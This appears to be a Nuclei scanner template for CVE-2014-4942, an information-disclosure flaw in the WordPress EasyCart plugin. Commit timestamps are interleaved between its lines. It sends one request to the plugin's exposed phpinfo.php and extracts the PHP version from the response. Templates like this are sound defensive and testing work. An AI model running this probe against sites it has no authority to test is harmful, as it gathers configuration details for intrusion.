2022-08-04 10:31:33 +00:00
id : CVE-2014-4942
info :
2022-10-10 19:22:59 +00:00
name : WordPress EasyCart <2.0.6 - Information Disclosure
2022-08-04 10:31:33 +00:00
author : DhiyaneshDk
2023-07-11 19:49:27 +00:00
severity : medium
2022-08-04 10:31:33 +00:00
description : |
2022-10-10 19:22:59 +00:00
WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to WordPress EasyCart version 2.0.6 or later.
2022-08-04 10:31:33 +00:00
reference :
2022-08-04 15:02:39 +00:00
- https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
2022-08-04 10:45:35 +00:00
- https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
- https://nvd.nist.gov/vuln/detail/CVE-2014-4942
2023-08-18 23:19:47 +00:00
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=
2022-08-12 00:45:50 +00:00
classification :
2023-08-18 23:19:47 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score : 5
2022-10-10 19:40:25 +00:00
cve-id : CVE-2014-4942
2022-10-10 19:22:59 +00:00
cwe-id : CWE-200
2023-08-18 23:19:47 +00:00
epss-score : 0.01024
2023-11-20 05:10:39 +00:00
epss-percentile : 0.82122
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-08-18 23:19:47 +00:00
vendor : levelfourdevelopment
product : wp-easycart
2023-09-06 13:22:34 +00:00
framework : wordpress
2023-08-18 23:19:47 +00:00
tags : wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
2022-08-04 10:31:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-04 10:31:33 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "PHP Extension"
- "PHP Version"
condition : and
- type : status
status :
- 200
extractors :
- type : regex
2023-08-25 12:29:19 +00:00
part : body
2022-08-04 10:31:33 +00:00
group : 1
regex :
2023-08-31 11:46:18 +00:00
- '>PHP Version <\/td><td class="v">([0-9.]+)'
2023-11-19 08:30:54 +00:00
# digest: 4a0a0047304502202a1d2cb579e19e0989f96090940f01f99d6134fa267f660f480ad886001148f6022100a2187f8307384e28596e434809749d7bd90e765afd0bf63fe42f3c783c5753b4:922c64590222798bb761d5b6d8e72950